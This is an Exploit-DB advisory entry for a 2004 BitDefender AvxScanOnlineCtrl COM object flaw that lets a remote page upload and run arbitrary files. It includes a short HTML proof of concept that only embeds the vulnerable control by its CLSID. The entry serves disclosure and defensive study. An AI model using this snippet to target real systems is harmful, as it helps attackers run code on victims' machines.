Softwin BitDefender - AvxScanOnlineCtrl COM Object Arbitrary File Upload / Execution

EDB-ID:

24024

CVE:

2004-1947

EDB Verified:

Author:

Rafel Ivgi The-Insider

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2004-04-19

Vulnerable App: 
source: https://www.securityfocus.com/bid/10174/info

Reportedly the BitDefender AvxScanOnlineCtrl COM object is affected by a file upload and execution vulnerability. This issue is due to a design error that allows a remote user to specify a file to be uploaded and executed on a system running the affected software.

This issue may be leveraged by a remote attacker to upload and execute arbitrary files on an affected system; most likely resulting in unauthorized access. Other attackers are also possible.

<HTML>
<OBJECT id=seemycomputer codeBase=http://www.bitdefender.com/scan/Msie/bitdefender.cab#version=3,0,0,1 hspace=0 vspace=0 align="top" classid=CLSID:80DD2229-B8E4-4C77-B72F-F22972D723EA width=405 height=180>
<PARAM NAME="_ExtentX" VALUE="6614">
<PARAM NAME="_ExtentY" VALUE="4498">
<PARAM NAME="_StockProps" VALUE="9">
<PARAM NAME="ForeColor" VALUE="0">
<PARAM NAME="BackColor" VALUE="16777215"></OBJECT>
</HTML>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services